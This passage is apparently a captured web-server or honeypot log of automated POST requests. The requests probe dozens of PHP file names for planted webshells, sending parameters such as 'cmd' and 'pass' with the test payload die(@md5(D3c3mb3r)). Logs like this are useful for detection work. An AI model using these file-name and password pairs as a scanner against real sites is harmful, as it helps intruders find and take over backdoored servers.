- "data": "POST /zuoss.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:26.000Z",
- "data": "POST /ou2.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:26.000Z",
- "data": "POST /ceshi.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:26.000Z",
- "data": "POST /1hou.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:25.000Z",
- "data": "POST /tomcat.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:24.000Z",
- "data": "POST /zuoindex.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:24.000Z",
- "data": "POST /linuxse.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:24.000Z",
- "data": "POST /zshmindex.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:23.000Z",
- "data": "POST /xz.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 30\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncc1362308=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:23.000Z",
- "data": "POST /miao.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nmiao=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:22.000Z",
- "data": "POST /tiandi.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:22.000Z",
- "data": "POST /app.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadc=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:22.000Z",
- "data": "POST /help.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadc=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:21.000Z",
- "data": "POST /sean.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nsean=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:20.000Z",
- "data": "POST /python.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nq=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:20.000Z",
- "data": "POST /9510.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nc=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:20.000Z",
- "data": "POST /default.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nq=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:19.000Z",
- "data": "POST /phpinfi.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiao=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:19.000Z",
- "data": "POST /3.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n321=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:18.000Z",
- "data": "POST /h1.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nh=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:18.000Z",
- "data": "POST /test.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nhello=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:18.000Z",
- "data": "POST /aaaa.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\naaaa=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:17.000Z",
- "data": "POST /post.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n0o0=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:16.000Z",
- "data": "POST /qq.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:16.000Z",
- "data": "POST /1213.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:16.000Z",
- "data": "POST /qwe.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:15.000Z",
- "data": "POST /ip.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nak10=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:15.000Z",
- "data": "POST /infoo.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n-7=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:14.000Z",
- "data": "POST /ak.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nak10=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:14.000Z",
- "data": "POST /hh.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\npass=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:14.000Z",
- "data": "POST /12.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nqiurong=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:13.000Z",
- "data": "POST /aw.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\naw=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:12.000Z",
- "data": "POST /wanan.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nwanan=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:12.000Z",
- "data": "POST /qq.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxx=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:12.000Z",
- "data": "POST /ssaa.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nq=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:11.000Z",
- "data": "POST /wan.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nwanan=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:11.000Z",
- "data": "POST /min.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nwanan=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:10.000Z",
- "data": "POST /mz.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nlz=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:10.000Z",
- "data": "POST /xx.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxx=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:10.000Z",
- "data": "POST /yumo.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n4875=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:09.000Z",
- "data": "POST /56.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nc=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:08.000Z",
- "data": "POST /q.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nq=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:08.000Z",
- "data": "POST /l8.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n2=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:08.000Z",
- "data": "POST /l7.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncnm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:07.000Z",
- "data": "POST /system.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:07.000Z",
- "data": "POST /l6.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncnm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:06.000Z",
- "data": "POST /aotu.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\naotu177=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:06.000Z",
- "data": "POST /bak.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:06.000Z",
- "data": "POST /cmd.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:05.000Z",
- "data": "POST /zuo.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:04.000Z",
- "data": "POST /hm.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nhm=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:04.000Z",
- "data": "POST /cainiao.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 29\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n23051831=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:04.000Z",
- "data": "POST /zuoshou.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:03.000Z",
- "data": "POST /q.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nnidie=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:03.000Z",
- "data": "POST /pe.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\npass=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:02.000Z",
- "data": "POST /webslee.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nking=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:02.000Z",
- "data": "POST /yao.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n123456=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:02.000Z",
- "data": "POST /defect.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n180217=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:01.000Z",
- "data": "POST /xiao.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiao=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:00.000Z",
- "data": "POST /feixiang.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 29\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nfeixiang=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:00.000Z",
- "data": "POST /ak47.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 30\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nbyshanhun=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:00.000Z",
- "data": "POST /ak48.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 30\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nbyshanhun=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:59.000Z",
- "data": "POST /phpStudy.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\na=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:59.000Z",
- "data": "POST /weixiao.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nweixiao=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:58.000Z",
- "data": "POST /conflg.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nconflg=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:58.000Z",
- "data": "POST /lindex.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nlindex=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:58.000Z",
- "data": "POST /phpstudy.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n0=die(@md5(D3c3mb3r));"
- },
- {
